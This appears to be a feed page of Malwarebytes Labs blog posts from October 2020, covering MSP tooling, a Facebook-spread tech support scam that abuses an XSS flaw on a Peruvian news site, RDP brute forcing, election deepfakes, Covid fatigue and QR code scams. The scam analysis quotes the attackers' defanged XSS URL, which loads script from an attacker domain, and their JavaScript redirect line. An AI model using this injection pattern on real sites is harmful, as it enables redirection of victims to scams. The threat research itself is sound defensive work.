Malware Bytes

The value of cybersecurity integration for MSPs

Malware Bytes Security - Thu, 10/22/2020 - 11:17am

For modern Managed Service Providers (MSPs), gone are the days of disparate workflows, and that’s really for the best.

Imagine trying to run a successful MSP business today—finding potential customers, procuring new clients, developing purchase orders, managing endpoints, and sending invoices—all without the help of Remote Monitoring and Management (RMM) and Professional Services Automation (PSA) tools. It would be ludicrous.

Why then should MSPs accept that another critical part of their daily workload does not integrate with their current product workstack—cybersecurity?

The short answer is they shouldn’t. With an increasingly complex threat landscape which includes evolving ransomware strategies and trickier phishing scams, MSPs need to be on their A-game. Further, as Malwarebytes Labs showed, medium-sized and enterprise businesses suffered dramatic hits to their cybersecurity postures due to the coronavirus pandemic, and the small businesses that many MSPs protect are likely suffering similar pains

The very nature of the MSP business demands integration. MSPs should ask the same from their cybersecurity solutions, allowing them to streamline their endpoint security practice with automated endpoint detection and deployment, advanced remediation, and simplified administration.

Why integration helps MSPs and their clients

MSPs today have likely been bombarded by the same arguments favoring RMM and PSA software—these products save time and make money. RMM tools mean no more driving to a physical site, no more scheduled check-ins where a client may have zero IT issues or a critical IT issue that only drags a team down for the rest of the day, and no more unreliability. Remotely addressing a client’s needs is a necessary component of today’s workload.

PSAs offer similar benefits in different areas. These tools can take disparate data flows and collate them into one source of truth. They can automate the generation and hand-off of data to prevent any human error from, for instance, an MSP’s marketing team to its sales team. These tools can also take vital billing data and transform it into trustworthy invoices, making sure that the countless hours of hard work get counted. And they can document purchase orders and make them easily accessible to every MSP employee that needs them. These tools can, in effect, remove the silos of chaos.

These benefits are obvious, and they help not just MSPs, but the clients that MSPs protect.

Being able to immediately field an IT request ticket from a client helps that client, increases their satisfaction, and lets them get back to their job more quickly. Automatically compiling service agreements for multiple clients means fewer opportunities for lost details or mistakes.

These things just make sense. But for MSPs, one of the most crucial roles they perform for clients can sometimes fall beyond the scope of most PSAs. That’s cybersecurity.

Benefits of cybersecurity integration

Every expert MSP knows that their job is more than just fixing IT issues as they happen. It’s also helping clients prevent computer issues before they can have a chance to occur. This doesn’t just help the clients, either, but it helps the many MSP tech workers already slammed with daily requests.

For an MSP, the more endpoints it manages that are already protected with a strong cybersecurity solution, the more endpoints that MSP won’t have to worry about, which means the more time that employees can devote full, personalized attention to the clients suffering other computer issues.

Unfortunately, while RMM and PSA tools have been the standard for decades, the integration with cybersecurity software into these tools is more recent. For years now, MSPs have been forced to sometimes go back to the disparate setups that their industry helped solve—logging into multiple applications to manage the same endpoint.

It didn’t make sense more than 10 years ago and it doesn’t make sense today.

MSPs should consider cybersecurity solutions that integrate directly with their PSA and RMM tools to prevent this repeated splintering of a workload.

Further, having an integrated cybersecurity solution can help an MSP better protect its clients. The integration will allow an MSP to more easily recommend that cybersecurity solution for clients when drafting up service agreements, and a protected client is just as important for the client as it is for the MSP helping them.

After all, so much of the job is cybersecurity, and that means protecting an endpoint before an attack hits, not just after.

The right, always-on, integrated cybersecurity solution will protect clients and their endpoints from disruptive ransomware attacks, sneaky phishing scams, unsafe websites injected with harmful code like credit card skimmers, and dangerous attachments sent through malicious emails. And when something does sneak through? MSPs can then easily rely on their RMM and PSA platforms to get a master-level view of what’s gone wrong, addressing and fixing the issue without having to navigate separate applications with potentially different logins, user interfaces, and data export settings.

There’s no reason to go back to disparate workflows. The MSP industry has been there, and it’s rightfully moved beyond it.

It should do the same when picking a cybersecurity solution for both itself and its clients.

The post The value of cybersecurity integration for MSPs appeared first on Malwarebytes Labs.

Categories: Malware Bytes

XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability

Malware Bytes Security - Wed, 10/21/2020 - 4:41pm

Tech support browser lockers continue to be one of the most common web threats. Not only are they a problem for end users who might end up on the phone with scammers defrauding them of hundreds of dollars, they’ve also caused quite the headache for browser vendors to fix.

Browser lockers are only one element of a bigger plan to redirect traffic from certain sites, typically via malvertising chains from adult portals or sites that offer pirated content.

There’s a slightly different campaign that we’ve been tracking for several weeks due to its high volume. Threat actors are relying on Facebook to distribute malicious links that ultimately redirect to a browser locker page. Their approach is interesting because it involves a few layers of deception including abusing a cross-site scripting vulnerability (XSS) on a popular website.

Malicious links shared via Facebook

Links posted onto social media platforms should always be scrutinized as they are a commonly abused way for scammers and malware authors to redirect users onto undesirable content. For this reason, you might see a disclaimer when you click on a link, warning you that it could be spam or dangerous.

The campaign we looked at appears to exclusively use links posted on Facebook, which is fairly unusual considering that traditionally tech support scams are spread via malvertising. Facebook displays a warning for the user to confirm that they want to follow the link. In this case, the destination is further obscured by the fact that the link is a shortened URL.

The threat actor is using the URL shortener to craft the first stage of redirection. In total, we catalogued 50 different links (see IOCs) over a 3 month period, suggesting that there is regular rotation to avoid blacklisting.

Although we do not know exactly how these links are being shared with Facebook users, we have some indication that certain games (i.e. apps on the Facebook site) may help to spread them. Because this is out of our reach, we have alerted Facebook in case it is able to identify the exact source.

Abuse of cross-site scripting vulnerability

The URL triggers the second stage redirection that involves a Peruvian website (rpp[.]pe) which contains a cross-site scripting vulnerability (XSS) that allows for an open redirect. Threat actors love to abuse open redirects as it gives some legitimacy to the URL they send victims. In this instance, the news site is perfectly legitimate and draws over 23 million visits a month.

In this case, we can see that code is being passed into the URL in order to load external JavaScript code from buddhosi[.]com, a malicious domain controlled by the attackers.

rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/ ?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}

The JavaScript in turn creates the redirection to the browlock landing page by using the replace() method:

top.location.replace('https://BernetteJudeTews[.]club/home/anette/? nr=855-472-1832&';

Besides redirecting users to other sites, an attacker could exploit the XSS to rewrite the current page into anything they like.

We reported this issue to Grupo RPP but have not heard back at the time of publication.

Cloaking domains

The open redirect trick is something that was added later on in the campaign. Originally the threat actors were directly loading decoy cloaking domains. Their purpose is to check incoming traffic and only serve the malicious content to legitimate victims. This is a very common practice and we’ve seen this before, for example with fake recipe sites.

We documented 6 domains involved in this third stage of the redirection process:


Server-side checks ensure visitors meet the requirements, namely a legitimate US residential IP address, and custom JavaScript is then served (an empty JavaScript is returned for non-interesting traffic).

The code (shared above) loads the browser locker landing page to one of the disposable and randomly-named domains using one of the newer TLDs:


We collected close to 500 such domains (see IOCs) during a period of a few months, but there are likely many more.

Browser locker at the end of the chain

The browser locker fingerprints the user to display the appropriate version for their browser. It shows an animation mimicking a scan of current system files and threatens to delete the hard drive after five minutes.

Of course this is all fake, but it’s convincing enough that some people will call the toll-free number for assistance. In all, we collected almost 40 different phone numbers (see IOCs) but this is not an exhaustive list.

This is where it ends for the traffic scheme, but where it truly begins for the tech support scam. We did not make contact with the call centre, but we know very well how this next part plays out.

Malwarebytes users were already protected against this browser locker, thanks to our Browser Guard web protection. We will continue to track and report this campaign.

Thanks to Marcelo Rivero for helping with the replay and Manuel Caballero for his insights on the XSS.

Indicators of Compromise

Bitly links





Cloaking domains


Browlock domains




Phone numbers





The post XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Brute force attacks increase due to more open RDP ports

Malware Bytes Security - Tue, 10/20/2020 - 8:00am

While leaving your back door open while you are working from home may be something you do without giving it a second thought, having unnecessary ports open on your computer is a security risk that is sometimes underestimated. That’s because an open port can be subject to brute force attacks.

What are brute force attacks?

A brute force attack is where an attacker tries every way he can think of to get in. Including throwing the kitchen sink at it. In cases where the method they are trying is to get logged in to your system, they will try endless combinations of usernames and passwords until a combination works.

Brute force attacks are usually automated, so it doesn’t cost the attacker a lot of time or energy. Certainly not as much as individually trying to figure out how to access a remote system. Based on a port number or another system specific property, the attacker picks the target and the method and then sets his brute force application in motion. He can then move on to the next target and will get notified when one of the systems has swallowed the hook.

Brute force methods

When trying to gain access to a remote system, an attacker will use one of these different types of attacks:

  • Reverse brute force attack. This type uses a common password or collection of passwords against many possible usernames. Sometimes the attacker may have an idea about the username or a part thereof. For example, they may know that a specific organization uses {first name}@{organization} as the default username for their employees. The attacker can then try a specific list of usernames and random passwords.
  • Credential stuffing is a type of attack where the criminal has a database of valid username and password combinations (usually stolen from other breaches) and tries out all these combinations on different systems. This is why it is never a good idea to reuse your passwords.
  • A hybrid brute force attack starts with the most feasible combinations and then keeps on trying from there. It often uses a dictionary attack where the application tries usernames or passwords using a dictionary of possible strings or phrases.
  • Rainbow table attacks only work when the attacker has some knowledge about the password they are trying to guess. In these attacks rainbow tables are used to recover a password based on its hash value. A rainbow table is a hash function used in cryptography for storing important data such as passwords in a database.
Brute forcing RDP ports

RDP attacks are one of the main entry points when it comes to targeted ransomware operations. To increase effectiveness, ransomware attacks are getting more targeted and one of the primary attack vectors is the Remote Desktop Protocol (RDP). Remote desktop is exactly what the name implies, an option to remotely control a computer system. It almost feels as if you were actually sitting behind that computer. Which is exactly what makes an attacker with RDP access so dangerous.

Because of the current pandemic, many people are working from home and may be doing so for a while to come. Working from home has the side effect of more RDP ports being opened. Not only to enable the workforce to access company resources from home, but also to enable IT staff to troubleshoot problems on the workers’ devices. A lot of enterprises rely on tech support teams using RDP to troubleshoot problems on employee’s systems.

But ransomware, although prevalent, is not the only reason for these types of attacks. Cybercriminals can also install keyloggers or other spyware on target systems to learn more about the organization they have breached. Other possible objectives might be data theft, espionage, or extortion.

Protect against brute force attacks

We’ve posted recommendations to protect against RDP attacks before. You can read more details in that post but basically the protection measures come down to:

  • Limit the number of open ports
  • Restrict the access to those that need it
  • Enhance security of the port and the protocol

The same basic security measures apply to other ports. In cybersecurity, the term open port refers to a TCP or UDP port number that is configured to accept packets. In contrast, a port which rejects connections or ignores all packets, is a closed port. The less open ports you have facing the internet, the safer it is. Limiting the number of open ports is a good start but closing all of them is almost never feasible.

For the ports that need to remain open and where you do expect visitors, it’s a good idea to disable legacy usernames, rotate passwords, and use 2FA if you can.

Security software guarding the entire network should raise alarm bells when a great number of attempts are detected. Anything that behaves like a brute force attack will look so different from normal login attempts that it shouldn’t be a problem if it is blocked. When a brute force attacker gets locked out for a few minutes after a few failed attempts, this will slow them down a lot and give you ample opportunity to take corrective and defensive measures.

It’s a numbers game

Many open ports can be used in a brute force attack, but RDP ports are the most desirable for anyone trying to gain access. RDP is easier because the attacker may have a reasonable idea about the username and only needs to brute force the password. It also offers a successful attacker a good chance to infiltrate the organization’s network further.

As mentioned earlier, the shift to working from home has caused a big raise in the number of open RDP ports around the globe. The number of RDP ports exposed to the Internet grew from about three million in January 2020 to over four and a half million in March. At Malwarebytes we noticed a similar surge in compromised servers that are used to run brute force tools or scan the Internet for vulnerable ports. Malwarebytes protects its customers by blocking the traffic from these IP addresses.

And please don’t think this can’t happen to your organization. We’ve seen high profile companies fall victim to ransomware where the suspected point of entry was an open RDP port.

Stay safe everyone!

The post Brute force attacks increase due to more open RDP ports appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (September 12 – September 18)

Malware Bytes Security - Mon, 10/19/2020 - 2:28pm

Last week on Malwarebytes Labs, we looked at journalism’s role in cybersecurity on our Lock and Code podcast, gave tips for safer shopping on Amazon Prime day, and discussed an APT attack springing into life as Academia returned to the real and virtual campus environment. We also dug into potential FIFA 21 scams, the return of QR code scams, Covid fatigue, and the absence of Deepfakes from the 2020 US elections.

Other cybersecurity news
  • Coronavirus SMS spoof risk: Researcher warns that genuine messages can be impersonated (Source: The Register)

Stay safe, everyone!

The post A week in security (September 12 – September 18) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Deepfakes and the 2020 United States election: missing in action?

Malware Bytes Security - Fri, 10/16/2020 - 11:00am

If you believe reports in the news, impending deepfake disaster is headed our way in time for the 2020 United States election. Political intrigue, dubious clips, mischief and mayhem were all promised. We’ll need to be careful around clips of the President issuing statements about being at war, or politicians making defamatory statements. Everything is up for grabs, and in play, or at stake. Then, all of a sudden…it wasn’t.

Nothing happened. Nothing has continued to happen. Where did our politically charged deepfake mayhem go to? Could it still happen? Is there time? With all the increasingly surreal things happening on a daily basis, would anybody even care?

The answer is a cautious “no, they probably wouldn’t.” As we’ve mentioned previously, there are two main schools of thought on this. Shall we have a quick refresher?

Following the flow

Stance 1: Catastrophe and chaos rain down from the heavens. The missiles will launch. Extreme political shenanigans will cause skulduggery and intrigue of the highest order. Democracy as we know it is imperilled. None of us will emerge unscathed. Deepfakes imperil everything.

Stance 2: Deepfakes have jumped the shark. They’d have been effective political tools when nobody knew about them. They’re more useful for subversive influence campaigns off the beaten track. You have to put them in the places you least expect, because people quite literally expect them. They’re yesterday’s news.

Two fairly diverse stances, and most people seem to fall in one of the two camps. As far as the US election goes, what is the current state of play?

2020 US election: current state of play

Imagine our surprise when instead of deepfaked election chaos, we have a poorly distorted gif you can make on your phone. It’s heralded as the first strike of deepfakes “for electioneering purposes”.

It’s dreadful. Something you’d see in the comment section of a Myspace page, as pieces of face smear and warp this way and that. People are willing to call pretty much anything a deepfake to add weight to their points. The knock-on effect of this is overload and gradual disinterest due to hype. Things many would consider a deepfake are turned away at the door as a result of everything in sight being called a deepfake.

This is a frankly ludicrous situation. Even so, outside of the slightly tired clips we’ve already seen, there doesn’t appear to be any election inroad for scammers or those up to no good.

What happened to my US election deepfakes?

The short answer is people seem to be much more taken with pornographic possibilities than bringing down Governments. According to Sensity data, the US is the most heavily targeted nation for deepfake activity. That’s some 45.4%, versus the UK in second place with just 10.4%, South Korea with 9.1%, and India at 5.2%. The most popular targeted sector is entertainment with 63.9%, followed by fashion at 20.4%, and politics with a measly 4.5%.

We’ve seen very few (if any) political deepfakes aimed at South Korean politicians. For all intents and purposes, they don’t exist. What there is an incredible amount of, are pornographic fakes of South Korean K-Pop singers shared on forums and marketplaces. This probably explains South Korea’s appearance in third place overall and is absolutely contributing to the high entertainment sector rating.

Similarly adding to both US and entertainment tallies, are US actresses and singers. Again, most of those clips tend to be pornographic in nature. This isn’t a slow trickle of generated content. It’s no exaggeration to say that one single site will generate pages of new fakes per day, with even more in the private/paid-for sections on their forums.

This is awful news for the actresses and singers currently doomed to find themselves uploaded all over these sites without permission. Politicians, for the most part, get off lightly.

What are we left with?

Besides the half dozen or so clips from professional orgs saying “What if Trump/Obama/Johnson/Corbyn said THIS” with a clip of said politician saying it (and they’re not that great either), it’s basically amateur hour out there. There’s a reasonably consistent drip-feed of parody clips on YouTube, Facebook, and Twitter. It’s not Donald Trump declaring war on China. It isn’t Joe Biden announcing an urgent press briefing about Hilary Clinton’s emails. It’s not Alexandria Ocasio-Cortez telling voters to stay home because the local voting station has closed.

What it is, is Donald Trump and Joe Biden badly lip-syncing their way through Bohemian Rhapsody on YouTube. It’s Trump and Biden talking about a large spoon edited into the shot with voices provided by someone else. I was particularly taken by the Biden/Trump rap battle doing the rounds on Twitter.

As you may have guessed, I’m not massively impressed by what’s on offer so far. If nothing else, one of the best clips for entertainment purposes I’ve seen so far is from RT, the Russian state-controlled news network. 

Big money, minimal returns?

Consider how much money RT must have available for media projects, and what they could theoretically sink into something they clearly want to make a big splash with. And yet, for all that…it’s some guy in a Donald Trump wig, with an incredibly obviously fake head pasted underneath it. The lips don’t really work, the face floats around the screen a bit, evidently not sharing the same frame of reference as the body. The voice, too, has a distinct whiff of fragments stitched together.

So, a convincing fake? Not at all. However, is that the actual aim? Is it deliberately bad, so they don’t run a theoretical risk of getting into trouble somehow? Or is this quite literally the best they can do?

If it is, to the RT team who put it together: I’m sorry. Please, don’t cry. I’m aiming for constructive criticism here.

They’re inside the walls

Curiously, instead of a wave of super-dubious deepfakes making you lose faith in the electoral system, we’ve ended up with…elected representatives slinging the fakes around instead.

By fakes, I don’t mean typical “cheapfakes”, or photoshops. I mean actual deepfakes.

Well, one deepfake. Just one.

“If our campaign can make a video like this, imagine what Putin is doing right now”

Bold words from Democratic candidate Phil Ehr, in relation to a deepfake his campaign team made showing Republican Matt Gaetz having a political change of heart. He wants to show how video and audio manipulation can influence elections and other important events.

Educating the public in electioneering shenanigans is certainly a worthwhile goal. Unfortunately, I have to highlight a few problems with the approach:

  1. People don’t watch things from start to finish. Whole articles go unread beyond the title and maybe the first paragraph. TV shows progress no further than the first ad break. People don’t watch ad breaks. It’s quite possible many people will get as far as Matt Gaetz saying how cool he thinks Barack Obama is, then abandon ship under the impression it was all genuine.
  2. “If we can make a video like this” implies what you’re about to see is an incredible work of art. It’s terrible. The synthetic Matt Gaetz looks like he wandered in off the set of a Playstation 3 game. The voice is better, but still betrayed by that halting, staccato lilt so common in audio fakery. One would hope the visuals being so bad would take care of 1), but people not really paying attention or with a TV on in the background are in for a world of badly digitised hurt.
An acceptable use of technology?

However you stack this one up, I think it’s broadly unhelpful to normalise fakes in this way during election cycles regardless of intention. Note there’s also no “WARNING: THIS IS FAKE” type message at the start of the clip. This is bad, considering you can detach media from Tweets and repurpose.

It’s the easiest thing in the world to copy the code for the video and paste it into your own Tweet minus his disclaimer. You could just as easily download it, edit out the part at the end which explains the purpose, and put it back on social media platforms. There’s so many ways you can get up to mischief with a clip like this it’s not even funny.

Bottom line: I don’t think this is a good idea.

Fakes in different realms

Other organisations have made politically-themed fakes to cement the theoretical problems posed by deepfakes during election time, and these ones are actually quite good. You can still see the traces of uncanny valley in there though, and we must once again ask: is it worth the effort? When major news cycles rotate around things as basic as conspiracy theories and manipulation, perhaps fake Putin isn’t the big problem here.

If you were in any doubt as to where the law enforcement action is on this subject: it’s currently pornography. Use of celebrity faces in deepfakes is now officially attracting the attention of the thin blue line. You can read more on deepfake threats (political or otherwise) in this presentation by expert Kelsey Farish.

Cleaning up the house

That isn’t to say things might not change. Depending on how fierce the US election battle is fought, strange deepfake things could still be afoot at the eleventh hour. Whether it makes any difference or not is another thing altogether, and if low-grade memes or conspiracy theories are enough to get the job done then that’s what people will continue to do.

Having said that: you can keep a watchful eye on possible foreign interference in the US election via this newly released attribution tracker. Malign interference campaigns will probably continue as the main driver of GAN generated imagery. Always be skeptical, regardless of suspicions over AI involvement. The truth is most definitely out there…it just might take a little longer to reach than usual.

The post Deepfakes and the 2020 United States election: missing in action? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

How Covid fatigue puts your physical and digital health in jeopardy

Malware Bytes Security - Thu, 10/15/2020 - 11:00am

After six months of social distancing, sheltering in place, working from home, distance learning, mask-wearing, hand-washing, and plenty of hand-wringing, people are pretty damn tired of COVID-19. And with no magic bullet (yet) and no end in sight, annoyance has turned into exasperation and even desperation.

Doctors and mental health professionals call this Covid fatigue.

Covid fatigue, not to be confused with fatigue as a symptom of the COVID-19 infection, can be characterized by denial, defeatism, and careless or reckless behavior in response to feeling overwhelmed and exhausted by a constant stream of pandemic-related information. And since COVID-19’s impact on our lives has been both profound and long-lasting, the fatigue is further pronounced by such prolonged exposure to intense stress. Conflicting information about the seriousness of the virus does little to provide relief. Instead, emotions are extra muddied by uncertainty about how stressed we should really be feeling.

Those of us in cybersecurity recognize this emotional response well. We’ve seen it play out in the digital realm in the form of security fatigue and alert fatigue, or what some doctors call “caution fatigue.” And we understand that if it isn’t addressed, it can lead to dangerous choices for the health and safety of people in the real world and online.

COVID-19 has upended nearly every facet of our lives, driving us into the open arms of the Internet like never before. Yet, as we struggle with anxiety and burnout related to the pandemic, our fatigue spills over into our online behavior. And with so many working and schooling from home, the stakes have never been higher.

So, when we see users exhibiting classic symptoms of Covid fatigue, security fatigue, or other caution fatigue, we feel their pain but recognize that this behavior can’t go on unchecked. If you think that you, your friends and family, or coworkers might be experiencing Covid fatigue, read on to learn how to recognize the symptoms, why they are dangerous, and what can be done to fight against it.

What is Covid fatigue?

To understand Covid fatigue, it helps to first zoom out and consider that fatigue is a natural response to any ongoing stressful situation or threat. When you couple that with the need to take specific actions to protect against that threat, you get caution fatigue. In an interview for a WebMD special report, Jacqueline Gollan, Associate Professor of Psychiatry and Behavioral Science at Northwestern’s Feinberg School of Medicine, explains what she means by the term caution fatigue:

“[Caution fatigue] is really low motivation or interest in taking safety precautions. It occurs because the constant state of being [on] alert for a threat can activate a stress hormone called cortisol, and that can affect our health and our brain function…When we’re subjected to high levels of stress, we start to desensitize to that stress. And then we begin to pay less attention to risky situations.”

Caution fatigue, then, can apply to numerous situations where individuals are under siege for an extended period of time and grow tired of being required to employ protective measures. This is especially true when the threat is not perceived as imminent or direct, and even more prominent when the threat is invisible. Other factors that increase caution fatigue include:

  • Lack of transparency into the threat or the reasons for the restrictions
  • Unfair or overly complicated restrictions or recommendations for safety precautions
  • Inconsistent actions and mixed messages about which measures are effective
  • Unpredictable changes to safety measures, including using subjective criteria to alter directions

Looking at this list in the context of the coronavirus pandemic, it appears we’ve checked off all the boxes, turning what was strong public support for COVID-19 response strategies into a collective case of the Mondays. According to an October report by the World Health Organization (WHO), pandemic fatigue has reached over 60 percent in some parts of Europe. In the United States, a July 2020 Kaiser Family Foundation poll found that 53 percent of Americans believed the pandemic had harmed their mental health.

WHO says that Covid fatigue is expressed through an increasing number of people not sufficiently following recommendations and restrictions, decreasing their effort to stay informed about the pandemic, and having lower risk perceptions related to COVID-19. Previously effective core messages about washing hands, wearing face masks, practicing proper hygiene, and maintaining physical distance may now be lost in the shuffle. Instead, vigilance is replaced by denial (I won’t get infected) or nihilism (we’re all screwed anyway, so I might as well do what I want).

What does Covid fatigue have to do with cybersecurity?

Covid fatigue shares characteristics with another form of fatigue that has long plagued the cybersecurity industry: security fatigue. In 2017, the National Institute of Standards in Technology (NIST) published a study stating that security fatigue was the threshold at which users found it too hard or burdensome to maintain security, a phenomenon affecting 63 percent of its participants.

The NIST report went further to say, “People are told they need to be constantly on alert, constantly ‘doing something,’ but they are not even sure what that something is or what might happen if they do or do not do it.”

Security fatigue and its cousin alert fatigue (which technicians are likely already familiar with) prevent users from taking definitive steps to protect themselves while connected to the Internet. Every news story on ransomware or major breach of personally identifiable information (PII) or cyberattack by a nation-state comes with its own set of “here’s how to protect against this” steps to follow.

Some of those instructions may be complex or incredibly specific, contributing to confusion (especially for those who aren’t tech savvy). Likewise, the constant pinging from alert notifications on security software may result in IT teams dismissing those alerts altogether.

Although there have been efforts to reduce security and alert fatigue, they likely make themselves known on a regular basis to anyone working in IT and security. For other users, security fatigue might flow as an undercurrent or barely register. But when you add Covid fatigue to the recipe, you get a dangerous cocktail of weary indifference.

Now, those with Covid fatigue aren’t just endangering themselves by ignoring best health practices and tuning out the latest news. They’re also letting their fatigue-influenced behavior spill over into other areas, including conducting business (or pleasure) online.

Because COVID-19 has forced much of the globe to spend a lot more time online, it has opened up the floodgates for cybercriminal activity, misinformation, and digital infection. Here, at the crossroads of Covid, security, and alert fatigue, people might find themselves in just as much danger on the Internet as they would be at a packed rally of maskless, cheering crowds.

Caroline Wong, CSO of pentest-as-a-service company Cobalt, recently spoke to Malwarebytes employees at a virtual fireside chat about Covid fatigue.

“One of the things that I worry about the most is anxiety and burnout and what that means for human error,” she said. “When we’re anxious, maybe we’re more likely to fall for a phishing scam. When I’m burnt out, maybe I’m more likely to purposefully or accidentally take some kind of a shortcut. Every behavior of an employee affects the security posture of the company.”

And behaviors have changed drastically for both users and cybercriminals since the onset of COVID-19. Here are a few examples of how threat actors are taking advantage of fatigued users:

  • Now that more people are shopping online to avoid crowded stores, cybercriminals have stepped up their credit card skimming efforts on legitimate sites. In just the first month of sheltering in place, digital skimming was up 26 percent. Users were previously told that a site secured by “https” and a lock icon should be safe. Those rules are now out the window.
  • Threat actors have weaponized information on COVID-19, using it as a hook to lure phishing victims, from SBA scams to nation-state espionage. Just consuming information about COVID-19 from the wrong source, then, could compromise users’ safety.
  • Students are distance learning, often on their own devices. And parents/individuals are mostly working from home, again using their (unprotected) personal devices to conduct work, or work devices to conduct personal errands. Cybercriminals look to capitalize on these risky choices by targeting employees on insecure devices and infiltrating business/school networks in the process.

“I think the biggest threat from Covid fatigue comes down to the massive distraction it causes,” said Adam Kujawa, Director of Malwarebytes Labs. “People who are so desperate for hope might scrutinize less and end up falling into a trap or exposing themselves to cyberthreats, just for the idea of relief.”

Combine this with the general malaise brought on by Covid fatigue, and you get an exponentially higher chance of infecting your home and business networks, rendering your devices obsolete, having your PII stolen and sold on the black market, opening the door for nation-state actors to spy on your organization, or even inviting threat actors to seize company files and ransom them for a hefty price.

How to fight Covid fatigue

If one of the symptoms of fatigue is feeling overwhelmed by a heavy dose of information and advice about what to do to combat a threat, how do you go about giving important information and advice about what to do to combat that threat? One method would be to consider the factors that are causing stress and fatigue and then deliver simple, actionable instructions to counter those factors. For example, if a constantly changing outlook on the future of the pandemic and other mixed messages are creating anxiety, consider only visiting a small selection of websites to find answers.

In researching for this article, I came across dozens of different recommendations for combatting Covid and security fatigue. Rather than overwhelm readers with too many choices, I opted to boil down all instructions to the three most pertinent. For battling Covid fatigue, try:

  1. Turning to a coping mechanism. Take a five minute break from the screen or TV if COVID-19 news is getting you down. If you need more time, spend it consumed in a favorite hobby to re-energize.
  2. Lowering your expectations. This may sound crude, but what it really means is give yourself a break. If you’re forgetting words or taking a long time to complete a project, forgive yourself. And if you think a vaccine will definitely be here in January 2021, perhaps consider placing your hopes elsewhere.
  3. Talking to someone. COVID-19 has been isolating for all of us. When loneliness strikes, schedule a virtual happy hour with a close friend, jump on a phone call with family members, or book an appointment with a trusted counselor.

In addition, remember these key preventative measures for keeping the virus at bay, recommended by leading scientists:

  1. Wear a mask in public. That includes not just stores and workplaces, but at any gathering with people outside your household.
  2. Wash your hands frequently. Especially after being around other people or handling any objects that came from outside your home.
  3. Practice social distancing. When in doubt, stay at least six feet away from others. Refrain from gathering in large groups, especially indoors in poorly-ventilated areas.

And finally, to ensure you don’t let Covid fatigue transform into security fatigue, remember these three important rules:

  1. Use a password manager. To avoid re-using passwords across accounts or having to remember 27 different ones, a password manager will keep your account credentials encrypted inside a digital vault, which can only be opened by a single master password. For extra protection, employ multi-factor authentication.
  2. Use security software on all of your devices, including your mobile phone. (iPhones don’t allow for external antivirus protection, but they do let users download robocall blockers and apps that secure mobile browsers.)
  3. Use common sense. We’ve learned that “trust but verify” doesn’t work for the Internet. If it seems too good to be true…you know the rest.

The post How Covid fatigue puts your physical and digital health in jeopardy appeared first on Malwarebytes Labs.

Categories: Malware Bytes

QR code scams are making a comeback

Malware Bytes Security - Thu, 10/15/2020 - 8:02am

Just when we thought the QR code was on its way out, the pandemic has led to a return of the scannable shortcut. COVID-19 has meant finding a digital equivalent to things normally handed out physically, like menus, tour guides, and other paperwork, and many organizations have adopted the QR code to help with this. And so, it would seem, have criminals. Scammers have dusted off their book of tricks that abuse QR codes, and we’re starting to see new scams. Or maybe just old scams in new places.

What is a QR code again?

A quick recap for those that missed it. A Quick Response (QR) code is nothing more than a two-dimensional barcode. This type of code was designed to be read by robots that keep track of items in a factory. As a QR code takes up a lot less space than a legacy barcode, its usage soon spread.

Smartphones can easily read QR codes—all it takes is a camera and a small piece of software. Some apps, like banking apps, have QR code-reading software incorporated to make it easier for users to make online payments. In some other cases, QR codes are used as part of a login procedure.

QR codes are easy to generate and they are hard to tell apart. To most human eyes, they all look the same. More or less like this:

URL to my contributor profile here Why are QR codes coming back?

For some time, these QR codes were mainly in use in industrial environments to help keep track of inventory and production. Later they gained some popularity among advertisers because it was easier for consumers to scan a code than to type a long URL. But people couldn’t tell from a QR code where scanning would lead them, so they got cautious and QR codes started to disappear. Then along came the pandemic and entrepreneurs had to get creative about protecting their customers against a real life virus infection.

To name an example, for fear of spreading COVID-19 through many people touching the same menu in a restaurant, businesses placed QR codes on their tables so customers could scan the code and open the menu in the browser on their phone. Clean and easy. Unless a previous visitor with bad intentions had replaced the QR code with his own. Enter QR code scams.

Some known QR code scams

The easiest QR code scam to pull off is clickjacking. Some people get paid to lure others into clicking on a certain link. What better way than to replace QR codes on a popular monument, for example, where people expect to find background information about the landmark by following the link in the QR code. Instead, the replaced QR code takes them to a sleazy site and the clickjacking operator gets paid his fee.

Another trick is the small advance payment scam. For some services, it’s accepted as normal to make an advance payment before you can use that service. For example, to rent a shared bike, you are asked to make a small payment to open the lock on the bike. The QR code to identify the bike and start the payment procedure is printed on the bike. But the legitimate QR codes can be replaced by criminals that are happy to receive these small payments into their own account.

Phishing links can just as easily be disguised as QR codes. Phishers place QR codes where it makes sense for the user. So, for example, if someone is expecting to login to start a payment procedure or to get access to a certain service, the scammers may place a QR code there. We’ve also seen phishing mails equipped with fraudulent QR codes.

Image courtesy of Proofpoint

The email shown above instructed the receiver to install the “security app” from their bank to avoid their account being locked down. However, it pointed to a malicious app outside of the webstore. The user had to allow installs from an unknown source to do this, which should have been a huge red flag, but still some people fell for it.

Lastly, there’s the redirect payments scam, which was used by a website that facilitated Bitcoin payments. While the user entered a Bitcoin address as the receiver, the website generated a QR code for a different Bitcoin address to receive the payment. It’s yet another scam that demonstrates that QR codes are too hard for humans to read.

How to avoid QR code scams

There are a few common sense methods to avoid the worse QR code scams:

  • Do not trust emails from unknown senders.
  • Do not scan a QR code embedded in an email. Treat them the same as links because, well, that’s what they are.
  • Check to see whether a different QR code sticker was pasted over the original and, if so, stay away from it. Or better yet, ask if it’s OK to remove it.
  • Use a QR scanner that checks or displays the URL before it follows the link.
  • Use a scam blocker or web filter on your device to protect you against known scams.

Even if the mail from a bank looks legitimate, you should at least double-check with the bank (using a contact number you’ve found on a letter or their website) if they ask you to log in on a site other than their own, install software, or pay for something you haven’t ordered.

As an extra precaution, do not use your banking app to scan QR codes if they fall outside of the normal pattern of a payment procedure.

Do I want to know what’s next?

Maybe not, but forewarned is forearmed. One method in development to replace QR codes on Android devices is the Near Field Communication (NFC) tag. NFC tags, like QR codes, do not require an app to read them on more modern devices. Most of the recent iPhones and Androids can read third-party NFC tags without requiring extra software, although older models may need an app to read them.

NFC tags are also impossible to read by humans but they do require an actual presence, i.e. they can’t be sent by mail. But with the rise in popularity of contactless payments, we may see more scams focusing on this type of communication.

Stay safe, everyone!

